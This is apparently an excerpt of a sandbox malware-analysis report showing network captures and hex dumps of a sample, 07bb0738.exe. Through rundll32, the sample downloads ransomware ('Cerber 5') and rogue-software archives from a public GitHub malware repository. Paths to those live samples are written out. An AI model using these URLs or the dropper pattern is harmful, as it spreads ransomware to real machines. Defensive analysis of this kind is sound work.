                                                                                                                                                    2022-09-29 12:59:23 UTC34772INData Raw: da b2 ca 8e 4e 2a 8c f4 78 e8 25 52 a6 4f 60 2e 63 7c f8 90 d4 8d ed 13 be 9d 1f 38 49 c7 62 7a 4f 13 17 02 b7 43 8e 50 26 98 e1 14 43 5d df f4 78 dc 5a 00 21 17 a2 9e 8c ff 68 25 b5 f9 e2 d2 3c 94 03 4b 5b d9 09 f4 9d 16 b1 14 34 d1 04 50 b2 c9 59 8a 9a 89 7d 01 19 9f 4e 96 f5 da a3 b1 1d f1 db 41 da 84 11 4c c0 f0 9e 9d 76 c6 9e ce cd 24 c6 89 25 89 67 71 54 34 18 d0 2e 14 14 9b 98 df 9f a4 a3 7a 15 43 fb 0d 1a 20 93 c5 d6 3f 26 85 fb 56 42 a4 cb 2f 49 a9 d1 2f 9d 9f fe 12 0f 09 66 82 79 c2 3d 0c dd b4 c2 a6 1b 30 3f 7a ae 3f b2 ad 1e 35 38 3e b8 75 7d ea 04 e4 87 03 b3 fc 1d 65 f7 04 bf 3e 34 04 34 8d 21 5f 42 7a 60 d4 99 91 a8 ae c8 36 33 c9 03 4d f5 65 71 11 f1 2d 3e 3c e6 95 95 02 ed 56 da 70 8d 51 ec 64 58 01 0a 9e c0 34 ba 9f 04 8a 4b 61 82 17 6f
                                                                                                                                                    Data Ascii: N*x%RO`.c|8IbzOCP&C]xZ!h%<K[4PY}NALv$%gqT4.zC ?&VB/I/fy=0?z?58>u}e>44!_Bz`63Meq-><VpQdX4Kao


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    129192.168.2.349772140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:24 UTC34782OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    13192.168.2.349714140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:52 UTC702OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    130140.82.121.3443192.168.2.349772C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:24 UTC34782INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:28 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:24 UTC34783INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    131192.168.2.349773185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:24 UTC34784OUTGET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    132185.199.108.133443192.168.2.349773C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:25 UTC34784INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 2284722
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "8a7bbc160d440a17d6ac37c40c91f7c318eb644a20006201447ba221ef497c63"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 3592:AB9E:ECB2F5:FC3511:63359366
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:25 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6927-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456365.884153,VS0,VE160
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: f4ed983a27c17f68a69bffa15fbd409eed6f6cf7
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:25 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:25 UTC34785INData Raw: 50 4b 03 04 14 00 01 00 08 00 c9 8a 34 3e 77 97 5c 9c f0 db 22 00 00 8e 23 00 1e 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 53 63 61 6e 6e 65 72 2e 65 78 65 20 c7 72 e1 36 7f a9 32 1e aa 4e 82 70 0b 31 2e cf b3 50 6d 0d 20 9a b2 e8 00 31 77 b5 12 cd 92 fd 0a 1a 82 2a 11 9a 37 0d df bd 74 5d be 55 96 56 66 a5 9f 8a de 75 d2 1a 74 ea 76 98 8c bf 2a d2 8b 29 78 4f 1c 3b 0f 14 ad 60 ae fc 26 16 76 c7 9f 81 44 64 89 8b 06 0a cc e9 04 69 e3 a6 b7 84 c9 38 6e 09 76 f4 9b fe 5e 0f 1c 1d 47 ba 7f bf 9e b9 2f a9 65 19 0c 6a 56 27 35 3e e4 ba 4e dd a8 59 0d d0 1a ad a0 77 f5 33 8e 92 27 e1 e4 1f 7b d1 f6 f3 a8 6f 8b 2f 48 b9 e8 fe 5e af af 36 90 9f 27 43 a1 0b fa f4 8d 03 7a 80 ec 8b 67 c5 62 82 4b a0 be 4c a5 3f 34 e3 c4 65 9d 91 84 50 de 33
                                                                                                                                                    Data Ascii: PK4>w\"#Endermanch@SecurityScanner.exe r62Np1.Pm 1w*7t]UVfutv*)xO;`&vDdi8nv^G/ejV'5>NYw3'{o/H^6'CzgbKL?4eP3
                                                                                                                                                    2022-09-29 12:59:25 UTC34801INData Raw: d0 69 36 f4 99 b6 d2 6a d7 f6 c5 ef e0 93 6b 92 8b 4c 8f dd 4b 1a aa 52 42 10 79 4f c8 4a 6a a7 d0 6a b5 80 32 a5 47 9d 42 41 4b df 84 95 74 3d 10 55 c3 e9 7e 68 60 34 de 88 47 c6 0f 96 0a 34 85 4c c1 bf 1c 31 54 4e 93 cb 7c bd 3d d3 37 7f 4c 70 0e 9e c8 53 c0 1d f1 08 c4 78 14 a5 8d be 25 26 57 55 94 0a 0a 39 73 58 74 2f 42 16 49 e1 8b 1c 4a 5c 8f bd cd 28 a5 5b bd fe e3 3e b4 2e 05 b4 67 b5 a5 37 c6 ca a7 57 fa da 46 c3 a0 03 59 0d ba f5 1c 7f 34 43 4c b5 ed 40 f6 ad 71 1b fb 7b 8c d8 74 dc 29 a4 81 2a 00 b4 14 e1 26 2e de 7d 86 d5 e3 fc 61 44 5c 89 d8 4e 6d 83 39 75 b9 c3 81 4f 7d a1 c3 29 78 b0 ee 87 6d ba ed 0c 2e c2 da 56 ae bc 56 7f c1 16 57 6b ad d7 93 16 d3 4a e1 79 c6 fa 3f 9f ee b1 b6 a9 83 0b d3 74 07 d3 b2 19 5e 6a ef 3a 92 02 0d ba fc 1f ae
                                                                                                                                                    Data Ascii: i6jkLKRByOJjj2GBAKt=U~h`4G4L1TN|=7LpSx%&WU9sXt/BIJ\([>.g7WFY4CL@q{t)*&.}aD\Nm9uO})xm.VVWkJy?t^j:
                                                                                                                                                    2022-09-29 12:59:25 UTC34817INData Raw: be 5d c4 78 6a 20 c6 66 59 4d e4 33 e1 b1 38 70 e0 27 28 56 41 49 a0 96 bf f8 94 69 63 95 39 90 74 ed 04 c0 a9 5d 32 8e b1 c0 50 3f 68 d4 d4 4e 33 0a 1b 33 2c eb 9d 55 16 33 a1 6f ac e6 03 33 91 a9 c3 ae cb 3b 0a 30 03 11 31 74 65 f6 c3 13 81 91 36 02 f8 ea 3e 54 77 16 96 a9 17 0a 96 b2 c6 ca 86 da 37 37 fb 90 5d 4f cb 75 0f 2b f6 fe f2 3e 0c 30 14 35 12 42 31 a9 53 a4 2b f4 c6 06 38 dc 99 d1 dd d4 49 24 9d 3a e6 68 57 0c b1 1f 6b 00 bb 1f 79 70 7e 9e 74 1b 2b e1 02 38 f5 4d 2c 96 05 e7 1f b0 e6 45 56 9a 5d 6b b9 00 7e 80 f4 b0 2c 3c cb ae b0 03 6b db 73 91 d1 30 79 99 5d 06 b3 e9 57 3e 18 44 d2 1b 95 c6 93 ef 3c 9c 67 46 95 53 19 4d 36 aa 95 c8 cc 69 87 90 25 2c 7c ef 89 f9 03 f9 de 57 bf dc b8 0a da 2d 3c 6d 4d 75 45 ef 03 7f 17 5f 1b bf 8f b9 50 b6 23
                                                                                                                                                    Data Ascii: ]xj fYM38p'(VAIic9t]2P?hN33,U3o3;01te6>Tw77]Ou+>05B1S+8I$:hWkyp~t+8M,EV]k~,<ks0y]W>D<gFSM6i%,|W-<mMuE_P#
                                                                                                                                                    2022-09-29 12:59:25 UTC34833INData Raw: ec db a4 40 56 40 b0 40 41 f4 0e 65 a1 4a d7 5e 2c 84 09 6b b0 ca a4 7d ea e6 8e 56 41 d1 c8 5a bf e2 56 b7 f9 aa 83 76 66 f3 66 1e ee 27 c2 f4 c6 31 8d ad 7a 35 ef 41 6f de 80 2f 79 44 a5 3a fe c6 10 74 3d b0 09 7a cc e8 32 98 c3 9a 35 20 f3 ea 12 ca d7 61 5b f0 31 b6 70 f3 b1 24 8c fd c3 94 8f 48 0e cf 2b 6b c8 65 d9 37 19 4d 24 f4 b3 bc ff 86 77 83 98 c9 c4 cf 24 b6 ef d5 2b 25 d1 44 dc 84 1f 2e 27 50 42 91 16 67 5d c7 fc fe 76 ec e3 95 05 82 dc 9d 30 96 25 42 f0 33 3f cd 9b 96 fd 9e 5f 3e d5 a8 69 6d af c6 42 ff b0 77 08 11 d4 1a b8 1b e4 84 63 a6 85 4f fc 94 07 98 25 88 42 bc 09 00 54 8e d6 7c f3 ff 7f 09 f3 57 3c 51 46 12 d9 23 aa 82 7f f7 cc 57 38 92 4b 8f 12 57 ae 69 5c d9 28 32 c6 9d 62 1f 64 41 f0 94 fe c2 44 f4 6f a2 4f d0 ce 83 89 0b cb 02 78
                                                                                                                                                    Data Ascii: @V@@AeJ^,k}VAZVvff'1z5Ao/yD:t=z25 a[1p$H+ke7M$w$+%D.'PBg]v0%B3?_>imBwcO%BT|W<QF#W8KWi\(2bdADoOx
                                                                                                                                                    2022-09-29 12:59:25 UTC34849INData Raw: e7 b9 f9 c2 7b 15 c1 41 e4 66 0d 32 35 01 4d ef 8d 67 70 f4 e3 d9 4b d7 64 c8 d6 2e 43 92 c9 bd d5 59 c5 d7 8f 8a b8 53 ff 50 eb c0 4b 95 d3 de 41 c9 9e 7a f6 a3 9e bb 29 d2 74 8e 19 e2 45 5e e9 52 d1 5c 74 c0 43 d4 f9 a1 ec e3 2e 69 3d bc be d8 f4 d8 c6 3e 10 fd 01 e5 4b 6f c2 72 45 e4 b7 5f 0e da 74 50 71 74 12 fa 57 b1 73 1b 52 ef c0 7a 3f af ab 4f 36 33 fa 6e a5 7e de 0d af 62 d7 bb 5c 75 6a a1 26 21 c2 61 67 c7 5e 05 3b c3 ca d7 09 d3 2c f6 24 72 4d e8 a1 72 70 3c 15 1b 52 82 31 ec 36 e2 9f c6 40 de 53 62 f7 28 59 ce 80 81 35 71 b6 08 b3 17 6b 58 1b 6e e5 1f 62 9f f8 2a 69 ce e3 41 62 d3 82 9e 15 38 3b 6b 1d 0a 59 38 a8 59 14 f5 87 76 cd 51 65 30 42 96 75 d8 28 8d 65 47 c9 55 c0 04 5d ed 85 64 ca 59 27 94 b0 50 36 32 74 57 25 d5 a6 45 26 ee 7c a5 74
                                                                                                                                                    Data Ascii: {Af25MgpKd.CYSPKAz)tE^R\tC.i=>KorE_tPqtWsRz?O63n~b\uj&!ag^;,$rMrp<R16@Sb(Y5qkXnb*iAb8;kY8YvQe0Bu(eGU]dY'P62tW%E&|t
                                                                                                                                                    2022-09-29 12:59:25 UTC34865INData Raw: 12 8b b1 53 94 32 73 8c 5c 0d 5b 3c 87 1a be 51 67 45 01 ef 76 c3 69 80 be 2c 86 57 3c b2 8f d1 fa cc 55 d1 ca a5 06 f6 78 f2 e4 f3 48 67 5e 26 9d 1f 11 ea 72 c1 b5 76 84 72 1f 6c cd 1a c2 92 b3 49 08 21 f3 9a b2 44 0e 72 fd b3 5b b7 99 16 d9 f4 d4 b1 88 28 bd 12 cf 20 a8 52 46 c0 26 aa 6f fb 87 d8 2f 0a 70 d7 5f 33 a5 0e 89 36 6e d3 e6 bd c8 90 62 ad ea a6 d5 1d d0 e3 01 25 7e 79 18 7b e9 9b 60 ca b9 81 66 d0 53 89 0d 04 7b 0c 01 f1 a2 4c 5b 20 51 e3 bd 23 04 18 9a 7a 1f f4 df a3 1c d0 8c 2b bc 47 d7 81 9b ac 6e dc c7 00 9b 90 f6 39 b8 51 00 97 ca 49 0e b1 75 c2 c5 cd d5 c3 35 60 b8 3e f3 d1 ff f8 ed e8 3f 32 fd 5b db 5a eb ac a8 40 f3 1d 77 98 d5 12 4e bb de 00 98 72 a1 12 bb 83 f8 ac 8f 97 7f 3a 90 96 13 7c 06 d1 8f bf 38 16 80 94 f1 d1 57 d1 91 39 20
                                                                                                                                                    Data Ascii: S2s\[<QgEvi,W<UxHg^&rvrlI!Dr[( RF&o/p_36nb%~y{`fS{L[ Q#z+Gn9QIu5`>?2[Z@wNr:|8W9
                                                                                                                                                    2022-09-29 12:59:25 UTC34881INData Raw: d7 a2 d3 6b 86 31 35 49 49 4d c7 89 0e ee ab 0e 2e 39 52 a6 b4 6c 6d ae 99 6d 89 54 6c 34 e1 f8 b3 ec 41 d8 9d 2d 76 2e 7f 94 36 c6 d3 a9 44 81 2f 71 0a f1 67 56 ae dd c0 ed 0f a1 f0 da 27 d1 f1 21 6b 31 3f 71 e7 0b a1 9f ec b4 2d 34 90 e3 51 54 e5 03 4d 3f 85 0e ee dd d8 63 db b5 7d 32 55 31 ac 46 b0 03 af f3 2d cc c7 71 e9 73 29 24 7a 05 ec 70 9c 28 16 3e 74 4b 95 58 8f 0d b9 0a ca 04 9c f7 7c 19 89 73 3e dd c3 7c 40 b8 1f 8a 74 20 79 fc 35 72 f7 3d 0f ee 9c b9 ef 8b 1b 0f c9 98 d4 ca 68 e3 dd 3c a5 17 e2 8d e7 a5 10 0e 21 5a 77 0f ba ba 84 2a 72 33 8e e7 ed 69 cc 90 68 52 3d 42 2e 1b dc 79 e5 73 2c 27 d2 14 69 55 87 fb da cf b2 8e ee 70 3c d3 e7 5c d2 7d 23 e8 58 96 8f 49 2b 1f 1b 9c cc cc b2 29 56 1f 62 36 0d cb 4b f5 a5 31 26 13 19 2d a1 af f7 5b 1b
                                                                                                                                                    Data Ascii: k15IIM.9RlmmTl4A-v.6D/qgV'!k1?q-4QTM?c}2U1F-qs)$zp(>tKX|s>|@t y5r=h<!Zw*r3ihR=B.ys,'iUp<\}#XI+)Vb6K1&-[
                                                                                                                                                    2022-09-29 12:59:25 UTC34897INData Raw: 5b 58 7b 34 cc 41 0b 3e 5a 79 c3 65 43 fe d3 54 85 c4 c8 96 88 b4 ee e5 b8 c8 14 d0 f8 81 1a eb ba 56 d2 76 be 32 1c 58 60 54 91 ed ce cf 73 1e 38 4c ec d4 30 aa 11 b7 e2 f7 9c cb f6 36 b0 7d 9d 72 4e 73 51 f0 1d 30 2b 16 33 18 42 99 53 e3 aa 66 26 a9 b9 9a 1e 57 f3 09 c6 0e cf 32 15 5a 62 dd 46 c1 52 95 29 e4 79 1d 21 f5 1d 22 d8 e1 8d 1f a0 6f a3 14 66 e6 f1 dc ac 44 88 b8 5d 22 cb ab 98 1f bd e6 e3 18 8f c3 67 e2 43 f5 4a 6e d3 12 9c c7 10 c7 f1 9d 4a c5 b0 01 2a e3 c9 99 c1 0b e2 04 78 1a f6 3e a8 4b 72 0f d9 b1 1f 99 af bf 66 5b 24 e3 3a da d0 54 13 35 63 d6 97 e6 10 32 f6 57 4c 57 d8 91 1d 50 84 6d 63 23 34 57 e5 c6 59 3a 94 d7 7c d8 c8 78 bc 8e 64 d1 a2 ff 4a 09 8a 93 c4 ce db 23 1c 1c 5e 15 2f d9 81 8a 6c b1 72 72 53 32 5b 14 b3 80 8a da 3e 3c b3
                                                                                                                                                    Data Ascii: [X{4A>ZyeCTVv2X`Ts8L06}rNsQ0+3BSf&W2ZbFR)y!"ofD]"gCJnJ*x>Krf[$:T5c2WLWPmc#4WY:|xdJ#^/lrrS2[><
                                                                                                                                                    2022-09-29 12:59:25 UTC34913INData Raw: 92 42 d2 63 a8 c4 69 58 b2 f0 37 6e f9 54 01 c8 a0 d0 b7 5e 64 ed 7e 02 0f c4 8b 8d 9e 90 e0 0e df 68 b0 a8 53 74 92 61 40 49 68 02 66 94 78 a0 ee a1 96 a7 e9 6c ca 74 3a d1 62 4a 03 ec 10 8b f9 c5 25 a7 7b d5 dc fc 88 73 58 b8 99 55 cc 29 ae 00 bf 7d 94 9b ab 24 4a f1 d8 ff d9 e9 52 d9 d1 eb 4b 71 ac c1 79 88 d1 c8 52 01 d9 b4 c7 04 17 17 73 b1 c1 45 d8 60 ba 66 59 8c e4 bd 1d 71 09 43 dd 89 f2 46 08 c3 0a 43 24 85 d0 1c 0c 78 8a ca f8 38 46 fa 95 67 87 77 26 82 03 57 6f 72 04 1d 7c 17 3d ff 12 bd 94 2a 56 03 a8 d1 f5 bd 14 b1 cb c1 9f fd 88 cd 34 ac ee e2 fd cf 2c f8 47 04 e0 af 59 d9 9d 25 1d 6e 2c 9e d7 78 e4 61 d4 a5 6e a9 3f f0 23 1f df a6 0f 66 39 f9 a5 b9 7d 2c 9f 39 78 c7 11 f5 5e f5 bf de 7a 11 4a 3c d7 08 74 71 a7 3a 71 f1 16 2e 56 5d 81 44 ab
                                                                                                                                                    Data Ascii: BciX7nT^d~hSta@Ihfxlt:bJ%{sXU)}$JRKqyRsE`fYqCFC$x8Fgw&Wor|=*V4,GY%n,xan?#f9},9x^zJ<tq:q.V]D
                                                                                                                                                    2022-09-29 12:59:25 UTC34929INData Raw: 26 31 09 b6 6c ba 1b b9 07 ec d2 98 1c 90 d8 65 31 af be 88 f7 b3 7a 23 f3 a9 16 fe 58 ee c8 3a 75 06 09 e9 c5 b7 01 57 09 f9 64 3e fa 3f 2b 87 05 4b 3b d9 d2 57 29 50 36 bc 3a 68 66 b4 bd 2f ab d0 e2 d0 58 1c 36 49 f1 d3 06 10 b1 56 a4 fc 67 55 2e 8b 21 31 51 a8 90 7a c2 f5 08 b8 7c 61 d5 21 20 4d 6e d9 e3 eb 71 9a f6 01 ce 2b 0d e7 6c 3a f0 1a 91 4e cc 04 48 e2 1d a9 41 b4 aa 01 36 3f 9c 81 83 09 d6 68 be 6e ed c6 fc 1d 79 85 7e 48 65 86 5b 5c 46 88 fd b7 f2 30 ed 16 c3 96 15 2f 41 49 c1 e2 71 91 40 e1 b4 d6 3c b1 10 5d 9a d6 88 a0 1f d6 10 51 6c 3b f9 42 2f 7c 19 34 50 30 b0 74 13 c4 ee aa 00 c1 31 33 d3 2d ea 65 2c 79 49 3c 7e 4d ba 12 3f d7 0a 4b ed e7 be 37 4b 4f f2 5e a7 db b7 8a 84 6d f5 76 8a 6c 90 04 76 d3 9b a3 26 ec 42 d2 18 52 76 c5 b7 cc c7
                                                                                                                                                    Data Ascii: &1le1z#X:uWd>?+K;W)P6:hf/X6IVgU.!1Qz|a! Mnq+l:NHA6?hny~He[\F0/AIq@<]Ql;B/|4P0t13-e,yI<~M?K7KO^mvlv&BRv
                                                                                                                                                    2022-09-29 12:59:25 UTC34945INData Raw: 0f f6 55 99 86 6d 27 80 90 14 f2 47 b2 98 41 20 7a f2 fe 59 a0 33 90 da fa 34 82 94 f2 63 e0 22 35 5b 0b 46 8a 48 17 86 47 08 a0 40 34 05 9a b3 53 25 65 dc e4 be 63 96 d5 10 aa 48 29 0a 8b bc 36 31 f3 b2 b8 49 73 6e e7 5d 9b 9c 13 2d ed fb dc 2a 33 ae 35 6e a3 98 9f d3 fe 44 22 88 5b ce 67 f5 f1 3c eb 2b c2 04 10 a7 ee aa 62 43 68 67 47 9f 59 53 79 84 2e c5 49 ab 4a d8 49 40 15 6e 35 49 dd 4c 53 e4 d2 3f 09 e6 06 27 fb 4b e9 8c 0a f9 e6 d2 58 fe 52 31 87 ab a4 26 60 db 79 e3 9a 73 6f 1c 41 8c bb 7a 5d 89 ed ea e8 17 71 99 f3 66 da f5 83 a5 79 6f 5c ff e1 e2 d7 7f 75 af 46 82 56 0a ce f8 a8 a1 f4 a4 03 48 73 89 c8 be c8 03 c3 07 3e a6 38 2f 02 5e 7d fe e1 ec cc 4b 0f 8d 9b af 14 e1 e5 92 db a6 41 e8 50 8e a7 2f e4 67 f1 ea 20 22 5e 4b 8f c6 c5 c9 aa 74 50
                                                                                                                                                    Data Ascii: Um'GA zY34c"5[FHG@4S%ecH)61Isn]-*35nD"[g<+bChgGYSy.IJI@n5ILS?'KXR1&`ysoAz]qfyo\uFVHs>8/^}KAP/g "^KtP
                                                                                                                                                    2022-09-29 12:59:25 UTC34961INData Raw: 35 14 24 cc f8 66 a3 e8 00 a0 a4 c5 2d 15 b6 29 fe 51 f9 81 f4 94 37 9a 07 7d 46 d4 f5 81 06 dd aa 2b 9d 67 31 f7 6a f5 1a 3c b9 cb c5 fc c7 16 2f c3 a3 e6 e2 37 6c c7 7a 82 59 9a 56 c0 f1 bb 4c 3a 8d ca 8e 9c 58 d5 06 24 87 fb ab c7 19 51 b0 c8 c8 e7 5d f7 d6 e5 4a 20 29 40 bd 5a b3 b2 82 ce 01 5f 66 5a db de 73 9e 64 73 ec 6b 9c ec 1e c7 c6 97 6e 30 ee a7 f8 9b ea 93 3a 3c 84 5b 31 99 c8 04 2c f5 95 7c f1 ba c2 7b 8b 39 6c 3c 39 57 7a ce 79 c1 24 a0 85 3e 5b 37 40 e3 88 ec 1c 54 b6 76 15 bb d4 81 b2 ae 5f 9d a9 2d d1 c6 38 e9 42 ab 23 c5 bc ff 89 e9 52 8c ef 25 ef e2 7d b6 bf aa 68 01 be e1 39 6e bf 01 cb 5e 6c 9c 5a a9 c3 6b cc f1 85 02 75 a8 ae d0 e2 d5 6f f2 b9 99 92 3b 3e 56 f4 a5 9c 86 62 1b 72 11 c1 db d6 19 95 c0 51 d0 ff b3 74 e0 97 59 e3 07 af
                                                                                                                                                    Data Ascii: 5$f-)Q7}F+g1j</7lzYVL:X$Q]J )@Z_fZsdskn0:<[1,|{9l<9Wzy$>[7@Tv_-8B#R%}h9n^lZkuo;>VbrQtY
                                                                                                                                                    2022-09-29 12:59:25 UTC34977INData Raw: cb c7 4f d8 fd 0f ff 01 29 06 99 0e 35 20 aa 27 2a e5 80 45 48 5a 5c 5c 1f 14 b8 17 ac 0f 8e 0a b3 24 65 80 8d 81 96 43 c1 37 80 5b 59 f9 d7 53 af c2 7f 48 2b 52 d2 f4 25 85 15 d9 99 1d 3d 46 25 99 a2 5e d0 cc da f2 d9 77 77 10 0d dc 1e e4 33 eb 34 4a 23 70 0c d2 db 88 76 15 8b 76 fa aa 0c 02 00 0c 1e 81 59 1f 1d 67 af 6c 45 66 8f d8 6b 75 80 66 1b c6 51 9a 68 22 15 60 11 6d 63 fc 35 b1 45 e9 88 75 f5 4c 4a 7b 72 bb 9b f4 57 4f 52 b8 b6 f8 e3 e8 19 0c 10 d9 07 4d e7 e8 f6 11 bf f2 0f ca 01 f2 eb 54 f2 df 36 d9 22 c0 bb b6 d2 fd 49 4b 90 91 4b 3c ee f4 26 f3 62 95 c7 e6 15 e7 6c 90 dd 17 a7 d1 d1 0a 2f c8 65 20 c5 c6 62 52 8a 23 2f 5b 3b 4f e8 dd 22 54 6d bc 3e 1b ec ec 28 80 03 27 bd de f0 00 22 7f e0 af 91 ba ef b8 14 6d 72 d9 24 d6 e4 65 28 a4 ef 4c 7f
                                                                                                                                                    Data Ascii: O)5 '*EHZ\\$eC7[YSH+R%=F%^ww34J#pvvYglEfkufQh"`mc5EuLJ{rWORMT6"IKK<&bl/e bR#/[;O"Tm>('"mr$e(L
                                                                                                                                                    2022-09-29 12:59:25 UTC34993INData Raw: 1c 3b 7b fa fa a7 7a 3f 35 00 96 9d c9 46 0d 14 58 10 8a 57 bd 55 7b b3 ea 2d a6 46 ee b5 b0 4f c2 5d 28 31 31 c2 b4 55 5a 2e c7 6d 01 84 67 19 87 29 63 15 76 b9 3c de 4f 80 d7 8d ad c8 9c c0 1b a3 2b 69 76 be 17 f2 af c9 f5 0b 41 15 93 4b 24 d4 94 80 77 e5 e8 f7 55 38 84 ce 5c 7a f9 b4 cf 6f 52 f0 56 a8 10 ac b5 a5 ea 68 ff dd c7 0c 12 9a 0f 2f 36 86 73 fe a0 44 df 22 25 5d d4 7b a3 a6 65 66 ee 8a 2c 89 9d db 87 98 d5 7a 06 b0 92 81 87 80 a7 54 06 b5 c8 27 6f d3 00 36 23 69 c2 8d 9b 01 6d 55 6f ad 4e eb 06 70 eb 7f 26 f2 57 bb b1 f3 e5 6b 78 19 e3 27 a3 4a 8c 01 a6 98 ce d6 3b f0 a3 e2 20 b1 a1 9d 2b c7 57 ce 54 45 00 15 de d9 5e a1 e5 88 e7 f3 b3 07 fb 67 f9 a2 7a 0c 97 3d dc 14 d0 db 67 8a ca ea 70 ee ec 6b 29 6a 04 c2 e5 56 4a a7 c7 a3 91 62 84 7e 4d
                                                                                                                                                    Data Ascii: ;{z?5FXWU{-FO](11UZ.mg)cv<O+ivAK$wU8\zoRVh/6sD"%]{ef,zT'o6#imUoNp&Wkx'J; +WTE^gz=gpk)jVJb~M
